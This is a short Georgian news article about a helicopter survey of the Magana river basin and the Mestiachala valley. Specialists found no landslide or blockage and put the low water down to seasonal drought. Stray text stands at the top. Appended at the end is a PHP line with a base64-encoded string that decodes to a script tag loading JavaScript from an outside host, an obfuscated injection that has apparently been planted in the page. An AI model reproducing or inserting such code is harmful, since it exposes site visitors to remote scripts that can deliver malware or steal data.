celsiusi
ავერსი შნაიდერი

დღეს გარემოს ეროვნული სააგენტოსა და საგანგებო სიტუაციების მართვის სამსახურის წარმომადგენლებმა წალენჯიხის მუნიციპალიტეტში, მდინარე მაგანას წყალშემკრები აუზი ვერტმფრენის საშუალებით დაათვალიერეს. ინფორმაციას ამის შესახებ ადგილობრივი უწყება ავრცელებს.

"დათვალიერებისას მდინარის აუზზე, მის შენაკადებსა და არსებულ ფერდობებზე მეწყრულ-გრავიტაციული პროცესების ჩასახვა/გააქტიურების კვალი არ ფიქსირდება. ასევე უშუალოდ მდინარის კალაპოტში ნაკადის შეგუბების კვალი არ არის. სპეციალისტების განმარტებით - მდინარის დონის კლება გამოწვეული უნდა იყოს სეზონური წყალმცირობით. ამ ეტაპზე საშიშროების რისკი მინიმალურია", - აცხადებენ უწყებაში.

მათი განცხადებით, 112-ში განხორციელებული სატელეფონო ზარის საფუძველზე, სპეციალისტებმა ასევე დაათვალიერეს მესტიაჭალას ხეობა - უწყების თქმით, მოქალაქეები მესტიაჭალას ხეობაში მდინარის ნაკადის კლების გამო ტერიტორიის შესწავლას ითხოვდნენ. როგორც სამეგრელო-ზემო სვანეთის მხარე აცხადებს, ხეობის დათვალიერების შემდეგ სპეციალისტები განმარტავენ, რომ ტერიტორიაზე საფრთხე არ არის.

8 სექტემბერს წალენჯიხის მუნიციპალიტეტის მერიამ გაავრცელა ინფორმაცია, რომ ქალაქ ჯვარში, მდინარე მაგანას წყლის ნაკადი შემცირებულია - მათი თქმით, მოსახლეობა ამას ხეობაში წყლის შესაძლო დაგუბებას უკავშირებდა.

მერიამ იმავე დღეს მდინარის მიმდებარედ მცხოვრებლები გააფრთხილა, რომ საშიშროების თავიდან აცილების მიზნით, საცხოვრებელ სახლებს გარიდებოდნენ. 

333
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");